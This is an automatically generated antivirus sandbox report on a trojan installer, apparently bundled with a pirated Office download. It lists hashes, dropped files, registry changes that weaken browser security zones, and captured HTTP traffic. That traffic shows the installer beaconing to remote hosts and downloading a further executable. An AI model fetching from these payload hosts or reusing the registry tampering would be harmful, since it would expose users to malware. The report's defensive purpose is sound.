Installer.Win32.InnoSetup.2.FD, Trojan.Win32.Sasfis.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Installer
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 9bd659f802479a9bf3ccf7545ef9a1e4
SHA1: 41cd20bab6628573148e52c30844357ca5d7745e
SHA256: b09ddb4e12cad384e8be48365ce6c205bd1c93a37ef85a5975d8d7c1677c9ca4
SSDeep: 24576:qiTAj2NdhIAtyY5pXKBOTH/XXvfmUDDhjqUPhZHZxWPY4h/2:qiMG9tyoxA8HfnmUPhjRbZxT4h
Size: 1010192 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: adsafiliados
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary: Installer. An installation package.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Installer creates the following process(es):
No processes have been created.
The Installer injects its code into the following process(es):
%original file name%.exe:1676
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1676 makes changes in the file system.
The Installer creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Color_Button_Hover.png (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\ie6_Dlm_main.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\sponsored.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB319.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\ProgressBarD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0F6.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\EN.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\760B5545_stp.DAT.part (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\ProgressD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Welcome_BG.jpg (18 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\mainDlm.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\bootstrap_34203.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\760B5545_stp.DAT (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Close.png (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\BGD.jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Color_Button.png (385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Resume_Button.png (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2FA.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\logo4[1].jpg (1041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Pause_Button.png (577 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Close_Hover.png (170 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adswarez[1].txt (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
The Installer deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\000CB319.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0F6.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2FA.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\bootstrap_34203.html (0 bytes)
Registry activity
The process %original file name%.exe:1676 makes changes in the system registry.
The Installer creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "708992537"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 77 53 67 3C 22 1E 2B EC 1F 37 5D D5 EF 37 37"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Installer modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Installer modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Installer modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Installer deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
cff4e84c73ced3564f31f78eba726d61 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\in1A1AEB34\760B5545_stp.DAT |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Installer file.
- Delete or disinfect the following files created/modified by the Installer:
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Color_Button_Hover.png (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\ie6_Dlm_main.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\sponsored.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB319.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\ProgressBarD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0F6.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\EN.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\760B5545_stp.DAT.part (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\ProgressD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Welcome_BG.jpg (18 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\mainDlm.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\bootstrap_34203.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Close.png (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\BGD.jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Color_Button.png (385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Resume_Button.png (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2FA.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\logo4[1].jpg (1041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Pause_Button.png (577 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Close_Hover.png (170 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adswarez[1].txt (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: adsafiliados
Product Name: Installer Setup
Product Version: 1.0.5.a0.1_54944
Legal Copyright: adsafiliados
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.5.a0.1_54944
File Description: Installer Setup
Comments: This installation was built with Inno Setup.
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 40240 | 40448 | 4.64999 | dbda5ee849ef82a713855f811e7bfc14 |
DATA | 45056 | 592 | 1024 | 1.90742 | 1ee71d84f1c77af85f1f5c278f880572 |
BSS | 49152 | 3724 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 53248 | 2384 | 2560 | 3.07115 | bb5485bf968b970e5ea81292af2acdba |
.tls | 57344 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 61440 | 24 | 512 | 0.14174 | 9ba824905bf9c7922b6fc87a38b74366 |
.reloc | 65536 | 2244 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 69632 | 11264 | 11264 | 3.10173 | 85e26c316dd351fa3b841914fb7ded69 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 25
Network Activity
URLs
URL | IP |
---|---|
hxxp://info.fodidodasal.com/?v=1.03&c=4dda1ae4&at=86346066&cntr=0 | 54.154.229.88 |
hxxp://ad5.adswarez.com/downloadimage/1264/13/d99394816486d094825965657734c00d/logo4.png?logotipo=automatico&uo=hxxp://www.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&nada=true | 104.28.17.74 |
hxxp://os.fodidodasal.com/adsafiliados/?v=6.0&c=325067414&t=834562 | 52.31.134.147 |
hxxp://rp.fodidodasal.com/?v=2.0&subver=6.21&pcrc=745675320 | 54.247.170.90 |
hxxp://rp.fodidodasal.com/?v=2.0&subver=6.21&pcrc=198775596 | 54.247.170.90 |
hxxp://ad5.adswarez.com/comp/1264/13/gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI.exe?plataforma=c1&&uo=hxxp://www.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&ud=hxxp://www.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html | 104.28.17.74 |
hxxp://162.243.100.13/?key=gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI&ud=http://www.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&n=Office 2016 - Completo em Português-BR (32 e 64 Bits) - PH Downs | |
hxxp://rp.Fodidodasal.com/?v=2.0&subver=6.21&pcrc=198775596 | |
hxxp://os.Fodidodasal.com/adsafiliados/?v=6.0&c=325067414&t=834562 | |
hxxp://info.Fodidodasal.com/?v=1.03&c=4dda1ae4&at=86346066&cntr=0 | |
hxxp://rp.Fodidodasal.com/?v=2.0&subver=6.21&pcrc=745675320 | |
img.fodidodasal.com | 146.185.27.45 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /adsafiliados/?v=6.0&c=325067414&t=834562 HTTP/1.1
Accept: */*
Host: os.Fodidodasal.com
User-Agent: ICAS
Content-Length: 1232
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 02 May 2016 04:59:26 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: nginx
X-ICSCT-CC: UA
X-ICSCT-CITY: Kharkiv
X-ICSCT-GICSET: global13712aICBA
X-ICSCT-IP: 194.242.96.218
X-ICSCT-SERVER-NAME: ads.slave-131-prod-eu-west-1c-7202a8fa
X-ICSCT-TIMESTAMP: 20160501235926346
X-ICSCT-VERSION: 1.3.1
X-ICSCT-XC: 1f3cfb072bc5ded412eb0f20eaa0b3fa349c056a
X-Robots-Tag: none
transfer-encoding: chunked
Connection: keep-alive
<<< skipped >>>
POST /?v=1.03&c=4dda1ae4&at=86346066&cntr=0 HTTP/1.1
Accept: */*
Host: info.Fodidodasal.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Content-Length: 172
Cache-Control: no-cache
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Date: Mon, 02 May 2016 04:59:25 GMT
Content-Length: 2176
Connection: keep-alive
<<< skipped >>>
GET /?key=gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI&ud=http://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&n=Office 2016 - Completo em Português-BR (32 e 64 Bits) - PH Downs HTTP/1.1
Range: bytes=0-60722
Accept: */*
Host: 162.243.100.13
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 02 May 2016 04:59:29 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Content-Disposition: attachment; filename=pixel.exe
Content-Description: File Transfer
Content-Length: 60723
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download
<<< skipped >>>
POST /?v=2.0&subver=6.21&pcrc=745675320 HTTP/1.1
Accept: */*
Host: rp.Fodidodasal.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Content-Length: 2368
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2016 04:59:26 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
POST /?v=2.0&subver=6.21&pcrc=198775596 HTTP/1.1
Accept: */*
Host: rp.Fodidodasal.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Content-Length: 1824
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2016 04:59:28 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
HEAD /?key=gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI&ud=http://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&n=Office 2016 - Completo em Português-BR (32 e 64 Bits) - PH Downs HTTP/1.1
Accept: */*
Host: 162.243.100.13
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 02 May 2016 04:59:28 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Content-Disposition: attachment; filename=pixel.exe
Content-Description: File Transfer
Content-Length: 60723
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download
GET /downloadimage/1264/13/d99394816486d094825965657734c00d/logo4.png?logotipo=automatico&uo=hXXp://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&nada=true HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ad5.adswarez.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 02 May 2016 04:59:26 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db7251cddee5fc32504072ca48c5a02d71462165166; expires=Tue, 02-May-17 04:59:26 GMT; path=/; domain=.adswarez.com; HttpOnly
X-Powered-By: PHP/5.5.7
CF-Cache-Status: MISS
Expires: Mon, 02 May 2016 08:59:26 GMT
Cache-Control: public, max-age=14400
Server: cloudflare-nginx
CF-RAY: 29c8e75fcd393714-ARN
<<< skipped >>>
HEAD /comp/1264/13/gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI.exe?plataforma=c1&&uo=hXXp://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&ud=hXXp://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html HTTP/1.1
Accept: */*
Host: ad5.adswarez.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Date: Mon, 02 May 2016 04:59:28 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: __cfduid=d000249d68a1c0a85133403ba896186991462165168; expires=Tue, 02-May-17 04:59:28 GMT; path=/; domain=.adswarez.com; HttpOnly
X-Powered-By: PHP/5.5.7
Location: hXXp://162.243.100.13/?key=gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI&ud=http://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&n=Office 2016 - Completo em Português-BR (32 e 64 Bits) - PH Downs
Server: cloudflare-nginx
CF-RAY: 29c8e76cbefa3714-ARN
<<< skipped >>>
Map
The Installer connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1676:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SUPPRESSMSGBOXES
/PASSWORD=password
Specifies the password to use.
For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.5.0)
Inno Setup Messages (5.5.3)
user32.dll
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
MsgWaitForMultipleObjects
ExitWindowsEx
comctl32.dll
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
true
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
1.0.5.a0.1_54944
%original file name%.exe_1676_rwx_00900000_000F7000:
.idata
.edata
P.reloc
P.rsrc
kernel32.dll